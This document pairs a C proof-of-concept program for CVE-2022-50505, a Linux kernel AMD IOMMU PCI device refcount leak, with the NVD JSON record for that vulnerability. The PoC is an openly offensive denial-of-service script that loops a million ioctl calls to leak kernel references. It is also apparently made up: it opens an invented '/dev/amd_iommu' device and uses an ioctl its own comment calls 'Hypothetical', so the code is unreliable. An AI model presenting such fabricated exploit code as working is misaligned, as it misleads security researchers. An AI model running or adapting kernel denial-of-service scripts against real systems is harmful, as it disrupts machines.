CVE-2022-50505

/* * CVE-2022-50505 - Linux Kernel AMD IOMMU PCI Device Refcount Leak PoC * This PoC demonstrates the refcount leak by repeatedly triggering * the ppr_notifier() code path through AMD IOMMU. * * Note: This requires local access and AMD IOMMU hardware support. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> /* Trigger PPR notifications via IOMMU infrastructure */ int trigger_ppr_notifier(void) { /* Open AMD IOMMU device interface */ int fd = open("/dev/amd_iommu", O_RDWR); if (fd < 0) { perror("Failed to open AMD IOMMU device"); return -1; } /* Repeatedly invoke PPR notifier path to leak refcount */ /* Each iteration leaks one reference count */ for (int i = 0; i < 1000000; i++) { /* Trigger PPR notification - this calls ppr_notifier() */ /* which leaks refcount on pci device */ ioctl(fd, 0x100, NULL); /* Hypothetical PPR trigger ioctl */ } close(fd); return 0; } int main(int argc, char *argv[]) { printf("CVE-2022-50505 PoC - AMD IOMMU Refcount Leak\n"); printf("Triggering ppr_notifier() repeatedly to leak PCI device refcount...\n"); if (trigger_ppr_notifier() != 0) { printf("Note: This PoC requires AMD IOMMU hardware and proper privileges\n"); return 1; } printf("Refcount leak triggered. Monitor /sys/kernel/debug/ for warnings.\n"); return 0; }

{"cve": {"id": "CVE-2022-50505", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:47.730", "lastModified": "2026-03-25T00:32:31.977", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu/amd: Fix pci device refcount leak in ppr_notifier()\n\nAs comment of pci_get_domain_bus_and_slot() says, it returns\na pci device with refcount increment, when finish using it,\nthe caller must decrement the reference count by calling\npci_dev_put(). So call it before returning from ppr_notifier()\nto avoid refcount leak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14", "versionEndExcluding": "4.14.303", "matchCriteriaId": "E245BC6C-44BD-47D1-A03D-9FE1F29BB25A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/03f51c72997559e73b327608f0cccfded715c9a0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6cf0981c2233f97d56938d9d61845383d6eb227c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6e501b3fd7a2e1c4372d72bc70717aaca2beb8a5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8581ec1feb895ff596fe3d326d9ba320083290aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/902cc2507091a81643502d8ceb0e2f105e902518", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b0637f4bd426925f5c3a15e8f8e36190fe06bac5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bdb2113dd8f17a3cc84a2b4be4968a849f69ec72", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/efd50c65fd1cdef63eb58825f3fe72496443764c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}